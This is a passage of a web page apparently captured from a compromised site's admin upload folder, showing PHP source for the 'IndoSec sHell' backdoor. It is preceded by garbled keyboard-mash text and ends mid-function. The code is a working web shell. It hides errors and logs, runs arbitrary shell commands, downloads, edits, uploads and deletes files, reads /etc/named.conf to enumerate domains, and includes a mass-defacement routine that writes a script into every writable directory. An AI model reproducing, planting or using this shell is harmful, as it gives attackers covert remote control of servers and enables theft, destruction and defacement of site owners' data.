]][ahhhhhhhasdasdassasdkksdadddsddfgh
במ12[aspddfsdfsdfdfnsd g ggk ffghaskjjsaddddkdasdasd asdadghdgh;';';'
/
home
/
swordshipmanagem
/
public_html
/
admin
/
upload
/
Upload FileeE
HOME
<?php /* * Konsep Shell : Brillyan -Founder { IndoSec }- * Pembuat : Holiq - { IndoSec } * Re-Code Boleh Asal Dah Izin Sama Pembuat, Ganti Author & Re-Code Tanpa Seizin Pembuat... Fix Lo Noob Anjenk * Klo Kga Bisa Bikin Cek Chanel IndoSec, Ada Tutornya, Jangan Cuma Bisa Ganti Author Doank Bangsad * https://www.youtube.com/playlist?list=PLAAbQaUpDeM7nGwS6WfaTm_cPC3RUiswi * Thanks For All Member { IndoSec }, Yang Telah Membantu Proses Pembuatan Shell,Dan Dari Shell Lain Untuk Inspirasinya * { IndoSec sHell } * �2019 { IndoSec } -Holiq- * Contact Me? fb.com/holiq.xid, WhatsApp? Cek Bio Fb * Nb: shell ini blm sepenuhnya selesai, jadi kalau menemukan error/tampilan tidak bagus/tidak responsive harap dimaklumi. V 0.2 */ session_start(); error_reporting(0); @set_time_limit(0); @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); /* Configurasi */ $aupas = "54062f3bf6377d42b4fab7c8fedfc7da";// IndoSec $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'UTF-8'; date_default_timezone_set("Asia/Jakarta"); function login_shell(){ ?> <!DOCTYPE html> <html> <head> <meta name="viewport" content="widht=device-widht, initial-scale=1.0"/> <meta name="theme-color" content="#343a40"/> <meta name="author" content="Holiq"/> <meta name="copyright" content="{ IndoSec }"/> <title>{ IndoSec sHell }</title> <link rel="icon" type="image/png" href="https://www.holiq.projectku.ga/indosec.png"/> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.0/css/bootstrap.min.css"/> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"/> </head> <body class="bg-dark text-center text-light"> <div class="container text-center mt-3"> <h1>{ INDOSEC }</h1> <h5>sHell Backdoor</h5><hr/> <p class="mt-3 font-weight-bold"><i class="fa fa-terminal"></i> Please Login</p> <form method="post"> <div class="form-group input-group"> <div class="input-group-prepend"> <div class="input-group-text"><i class="fa fa-user"></i></div> </div> <input type="password" name="pass" placeholder="User Id..." class="form-control"> </div> <input type="submit" class="btn btn-danger btn-block" class="form-control" value="Login"> </form> </div> <a href="https://facebook.com/IndoSecOfficial" class="text-muted fixed-bottom mb-3">Copyright 2019 @ { IndoSec }</a> </body> </html> <?php exit; } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])){ if(isset($_POST['pass']) && (md5($_POST['pass']) == $aupas)){ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }else{ login_shell(); } } /* * Akhir Login * * Aksi Download */ if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['aksi'] == 'download')){ @ob_clean(); $file = $_GET['file']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } function w($dir,$perm){ if(!is_writable($dir)){ return "<font color='red'>".$perm."</font>"; }else{ return "<font color='lime'>".$perm."</font>"; } } function r($dir,$perm){ if(!is_readable($dir)){ return "<font color=red>".$perm."</font>"; }else{ return "<font color=lime>".$perm."</font>"; } } function exe($cmd){ if(function_exists('system')){ @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; }elseif(function_exists('exec')){ @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; }elseif(function_exists('passthru')){ @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; }elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000){ // Socket $info = 's'; }elseif (($perms & 0xA000) == 0xA000){ // Symbolic Link $info = 'l'; }elseif (($perms & 0x8000) == 0x8000){ // Regular $info = '-'; }elseif (($perms & 0x6000) == 0x6000){ // Block special $info = 'b'; }elseif (($perms & 0x4000) == 0x4000){ // Directory $info = 'd'; }elseif (($perms & 0x2000) == 0x2000){ // Character special $info = 'c'; }elseif (($perms & 0x1000) == 0x1000){ // FIFO pipe $info = 'p'; }else{ // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } $path = str_replace('\\','/',$path); $paths = explode('/',$path); if(isset($_GET['dir'])){ $dir = $_GET['dir']; chdir($dir); }else{ $dir = getcwd(); } $os = php_uname(); $ip = getHostByName(getHostName()); $ver = phpversion(); $web = $_SERVER['HTTP_HOST']; $sof = $_SERVER['SERVER_SOFTWARE']; $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; $total = disk_total_space($dir); $free = disk_free_space($dir); $pers = (int) ($free/$total*100); $ds = @ini_get("disable_functions"); $show_ds = (!empty($ds)) ? "<a href='?dir=$dir&aksi=disabfunc' class='ds'>$ds</a>" : "<a href='?dir=$dir&aksi=disabfunc'><font color=green>NONE</font></a>"; $imgfol = "<img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img>"; $imgfile = "<img src='http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png' class='ico2'></img>"; function formatSize( $bytes ){ $types = array( 'B', 'KB', 'MB', 'GB', 'TB' ); for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ ); return( round( $bytes, 2 )." ".$types[$i] ); } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } $d0mains = @file("/etc/named.conf", false); if (!$d0mains){ $dom = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>"; $GLOBALS["need_to_update_header"] = "true"; }else{ $count = 0; foreach ($d0mains as $d0main){ if (@strstr($d0main, "zone")){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } $dom = "$count Domain"; } function swall($swa,$text,$dir){ echo "<script>Swal.fire({ title: '$swa', text: '$text', type: '$swa', }).then((value) => {window.location='?dir=$dir';})</script>"; } function about(){ echo '<div class="card text-center bg-light about"> <h4 class="card-header">{ IndoSec }</h4> <div class="card-body"> <center><div class="img"></div></center> <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p> </div> <div class="card-footer"> <small class="card-text text-muted">Copyright 2019 { IndoSec }</small> </div> </div><br/>'; exit; } function aksiUpload($dir){ echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader"> <div class="card"> <div class="card-body form-group"> <p class="text-muted">//Multiple Upload</p> <div class="custom-file"> <input type="file" name="file[]" multiple class="custom-file-input" id="customFile"> <label class="custom-file-label" for="customFile">Choose file</label> </div> <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload"> </div> </div> </form>'; if(isset($_POST['upload'])){ $jumlah = count($_FILES['file']['name']); for($i=0;$i<$jumlah;$i++){ $filename = $_FILES['file']['name'][$i]; $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); } if($jumlah < 2){ if($up){ $swa = "success"; $text = "Berhasil Upload $filename"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Upload File"; swall($swa,$text,$dir); } }else{ $swa = "success"; $text = "Berhasil Upload $jumlah File"; swall($swa,$text,$dir); } } } function chmodFile($dir,$file,$nfile){ echo "<form method='POST'> <h5>Chmod File : $nfile </h5> <div class='form-group input-group'> <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'> <input type='submit' class='btn btn-danger form-control' value='Chmod'> </div> </form>"; if(isset($_POST['perm'])){ if(@chmod($_GET['file'],$_POST['perm'])){ echo '<font color="lime">Change Permission Berhasil</font><br/>'; }else{ echo '<font color="white">Change Permission Gagal</font><br/>'; } } exit; } function buatFile($dir,$imgfile){ echo "<h4>$imgfile Buat File :</h4> <form method='POST'> <div class='input-group'> <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'> <div class='input-group-prepend'> <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div> </div> </div><br/> <div id='output'></div> <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/> <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'> </form>"; if (isset($_POST['bikin'])){ $name = $_POST['nama_file']; $isi_file = $_POST['isi_file']; foreach ($name as $nama_file){ $handle = @fopen("$nama_file", "w"); if($isi_file){ $buat = @fwrite($handle, $isi_file); }else{ $buat = $handle; } } if ($buat){ $swa = "success"; $text = "Berhasil Membuat File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Membuat File"; swall($swa,$text,$dir); } } } function view($dir,$file,$nfile,$imgfile){ echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ] <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5> <textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>'; } function editFile($dir,$file,$nfile,$imgfile){ echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; echo "<form method='POST'> <h5>$imgfile Edit File : $nfile</h5> <textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/> <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button> </form>"; if(isset($_POST['edit_file'])){ $updt = fopen("$file", "w"); $hasil = fwrite($updt, $_POST['isi']); if ($hasil){ $swa = "success"; $text = "Berhasil Update File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Update File"; swall($swa,$text,$dir); } } } function renameFile($dir,$file,$nfile,$imgfile){ echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; echo "<form method='POST'> <h5>$imgfile Rename File : $nfile</h5> <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/> <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button> </form>"; if(isset($_POST['rename_file'])){ $lama = $file; $baru = $_POST['namanew']; rename( $baru, $lama); if(file_exists($baru)){ $swa = "success"; $text = "Nama $baru Telah Digunakan"; swall($swa,$text,$dir); }else{ if(rename( $lama, $baru)){ $swa = "success"; $text = "Berhasil Mengganti Nama Menjadi $baru"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Mengganti Nama"; swall($swa,$text,$dir); } } } } function hapusFile($dir,$file,$nfile){ echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ] [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ] [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ] [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]'; echo "<div class='card card-body text-center text-dark mb-4'> <p>Yakin Menghapus : $nfile</p> <form method='POST'> <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a> <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'> </form> </div>"; if ($_POST['ya']){ if (unlink($file)){ $swa = "success"; $text = "Berhasil Menghapus File"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Menghapus File"; swall($swa,$text,$dir); } } } function chmodFolder($dir,$ndir){ echo "<form method='POST'> <h5>Chmod Folder : $ndir </h5> <div class='form-group input-group'> <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['dir'])), -4)."'> <input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'> </div> </form>"; if(isset($_POST['chmo'])){ if(@chmod($_GET['dir'],$_POST['perm'])){ echo '<font color="lime">Change Permission Berhasil</font><br/>'; }else{ echo '<font color="white">Change Permission Gagal</font><br/>'; } } exit; } function buatFolder($dir,$imgfol){ echo "<h5>$imgfol Buat Folder :</h5> <form method='POST'> <div class='input-group'> <input type='text' class='form-control' name='nama_folder[]' placeholder='Nama Folder...'> <div class='input-group-prepend'> <div class='input-group-text'><a id='add_input1'><i class='fa fa-plus'></i></a></div> </div> </div><br/> <div id='output1'></div> <input type='submit' class='btn btn-info btn-block' name='buat' value='Buat'> </form>"; if (isset($_POST['buat'])){ $nama = $_POST['nama_folder']; foreach ($nama as $nama_folder){ $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_folder); $fd = @mkdir ($folder); } if ($fd){ $swa = "success"; $text = "Berhasil Membuat Folder"; swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Membuat Folder"; swall($swa,$text,$dir); } } } function renameFolder($dir,$ndir,$imgfol){ echo "[ <a href='?dir=".$dir."&aksi=rename_folder' class='active'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder'>Delete</a> ] <h5>$imgfol Rename Folder : $ndir </h5> <form method='POST'> <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nama'><br/> <button type='sumbit' class='btn btn-info btn-block' name='ganti'>Ganti!!</button><br/> </form>"; if(isset($_POST['ganti'])){ $baru = htmlspecialchars($_POST['namanew']); $ubah = rename($dir, "".dirname($dir)."/".$baru.""); if($ubah){ $swa = "success"; $text = "Berhasil Mengganti Nama"; $dir = dirname($dir); swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Gagal Mengganti Nama"; $dir = dirname($dir); swall($swa,$text,$dir); } } exit; } function deleteFolder($dir,$ndir){ echo "[ <a href='?dir=".$dir."&aksi=rename_folder'>Rename</a> ] [ <a href='?dir=".$dir."&aksi=hapus_folder' class='active'>Delete</a> ] <div class='card card-body text-center text-dark mb-4'> <p>Apakah Yakin Menghapus : $ndir ?</p> <form method='POST'> <a class='btn btn-danger btn-block' href='?dir=".dirname($dir)."'>Tidak</a> <input type='submit' name='ya' class='btn btn-success btn-block' value='Ya'> </form> </div><br/>"; if ($_POST['ya']){ if(is_dir($dir)){ if(is_writable($dir)){ @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $swa = "success"; $text = "Berhasil Menghapus"; $dir = dirname($dir); swall($swa,$text,$dir); }else{ $swa = "error"; $text = "Berhasil Menghapus"; $dir = dirname($dir); swall($swa,$text,$dir); } } } exit; } function aksiMasdef($dir,$file,$imgfol,$imgfile){ function tipe_massal($dir,$namafile,$isi_script){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ file_put_contents($lokasi, $isi_script); }elseif($dirb === '..'){ file_put_contents($lokasi, $isi_script); }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ echo "Done > $lokasi\n"; file_put_contents($lokasi, $isi_script); $masdef = tipe_massal($dirc,$namafile,$isi_script); } } } } } } function tipe_biasa($dir,$namafile,$isi_script){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ file_put_contents($lokasi, $isi_script); }elseif($dirb === '..'){ file_put_contents($lokasi, $isi_script); }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ echo "Done > $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']){ echo "[ <a href='?dir=$dir'>Kembali</a> ] <textarea class='form-control' rows='13' disabled=''>"; if($_POST['tipe'] == 'mahal'){ tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); }elseif($_POST['tipe'] == 'murah'){ tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); } echo "</textarea><br/>"; }else{ echo "<form